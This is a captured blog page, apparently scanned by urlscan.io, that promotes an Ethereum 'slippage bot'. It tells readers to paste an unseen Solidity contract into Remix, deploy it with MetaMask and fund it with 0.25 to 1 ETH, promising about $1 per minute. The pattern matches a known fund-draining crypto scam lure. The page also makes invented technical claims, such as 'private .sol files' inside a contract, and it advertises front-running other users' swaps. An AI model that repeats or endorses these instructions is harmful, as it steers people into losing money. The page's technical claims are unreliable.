nicketh.com Open in urlscan Pro
190.97.166.162  Public Scan

URL: https://nicketh.com/
Submission: On December 17 via api from BE — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Skip to content

Nick / ETH




BLOG


 * [UPDATED 2024] ETHEREUM SLIP BOT AUTO INJECTS TRANSACTIONS, GENERATES $1 PER
   MIN ON AUTOPILOT
   
   
   NICK / $ETH
   
   
   [STEP-BY-STEP TUTORIAL] THIS ETHEREUM SLIP BOT AUTO INJECTS TRANSACTIONS,
   GENERATES ALMOST $1 PER MIN ON AUTOPILOT
   
   
   THIS IS MY STEP-BY-STEP TUTORIAL ON HOW TO DEPLOY THE SAME BOT IN YOUR OWN
   SMART CONTRACT.
   
   Play Video
   
   Facebook Twitter Youtube
   
   Updated December 12th 2024
   
   My name is Nick, and I am a blockchain developer specializing in Solidity.
   
   I’ve spent hours pouring over the smart contract and directories for the
   infamous Ethereum sandwich bot (JaredFromSubway.eth) which utilizes slippage
   on the blockchain to generate a consistent profit after it is deployed.
   
   While some of the actual contract is public on the blockchain, most of it is
   behind private .sol files within the smart contract itself. It took quite a
   bit of time to deconstruct the code to mimic the slippage capabilities of the
   original bot.
   
   Today I’ll be breaking down the code to deploy a similar Ethereum trading bot
   I recently built in Solidity which mimics the trader algorithm of the
   original bot to generate small, consistent profits.
   
   Once deployed, our slippage bot will allow you to automatically trade a token
   from the Ethereum blockchain without needing to manually transact through
   traditional methods. Everything is handled by the smart contract itself.
   
   It takes advantage of decentralized platforms like Uniswap or Pancake swap,
   to sandwich transactions for arbitrage.
   
   Theses exchanges handle thousands of transaction requests to swap tokens and
   our bot is designed to explore the mempool for transactions that are pending
   within a block, allowing us to inject the transaction with a higher gas fee.
   The mempool is a cryptocurrency node’s mechanism for storing information on
   unconfirmed transactions.
   
   This will allow us to process our order first, then process a sell order in
   the same block right after.
   
   Essentially, the pending transaction on the swap network gets sandwiched
   between ours, and the sell transaction, and we make a small fee per
   transaction.
   
   It may only be $1-10 per transaction, but when the bot is automatically
   processing multiple transactions per hour it can really add up.
   
   I am sharing this code because each bot can only do 1 transaction every few
   block seconds, and there is hundreds of thousands of transactions every
   minute on the Ethereum blockchain.
   
   
   [VIDEO] FULL DEPLOY INSTRUCTIONS:
   
   Play Video
   
   
   FULL STEP-BY-STEP TEXT DEPLOY INSTRUCTIONS:
   
    1. Download MetaMask for your browser. MetaMask is the world’s leading
       self-custody wallet used by millions of users worldwide.
    2. Open RemixIDE in your browser. We are using Google Chrome.
    3. Right click on the ‘contracts’ folder and create a new file. Rename it as
       you like—i.e., ‘Bot.sol’
    4. Paste this bot contract code we wrote into Remix. Verify that the
       contract address in the code is the wETH (wrapped ether) contract
       address.
    5. Move to the ‘Solidity Compiler’ tab, select version ‘0.6.6’ and then
       click ‘Compile’.
    6. Move to the ‘Deploy’ tab, select ‘Injected Provider’ as the environment,
       then click ‘Deploy’.
   
   After the transaction is confirmed, your new slippage bot is live on the
   blockchain.
   
   Deposit funds (we recommend at least 0.25 ETH to prevent missing
   transactions) to your exact contract / bot address.
   
   After your transaction is confirmed, start the bot by clicking the ‘start’
   button.
   
   You are off to the races!
   
   You can withdraw profit anytime by clicking “withdraw”.
   
   I’d typically recommend letting the bot run for 24 – 48 hours before
   withdrawing ETH.
   
   Re: Funding The Contract I’ve received messages from people who didn’t fund
   the contract with enough Ethereum to cover gas fees and possible burn fees
   for the bot to start injecting transactions. The bot targets token contracts
   with max 10% burn fee. However, nowadays most tokens come with 2~6% fees. If
   you fund the contract with 0.4 ETH or less, and the bot targets another token
   with high burn fees, the contract will waste a lot of gas fees. I recommend
   funding the contract with at least 0.25 ~ 1 ETH to make sure that won’t
   happen. × Dismiss this alert.
   
   
   .SOL BOT SOURCE CODE
   
   I am also hosting the code here on Pastebin in if you’d like to save just the
   code for future use, but the full code can be copied and pasted below.
   
   
   NICK / $ETH
   
   
   SOLIDITY TUTORIALS, BLOCKCHAIN UPDATES & MORE!
   
   December 11, 2024





NICK / ETH

Crypto Code, News & More


 * Blog
 * About
 * FAQs
 * Authors

 * Events
 * Shop
 * Patterns
 * Themes



Twenty Twenty-Five

Designed with WordPress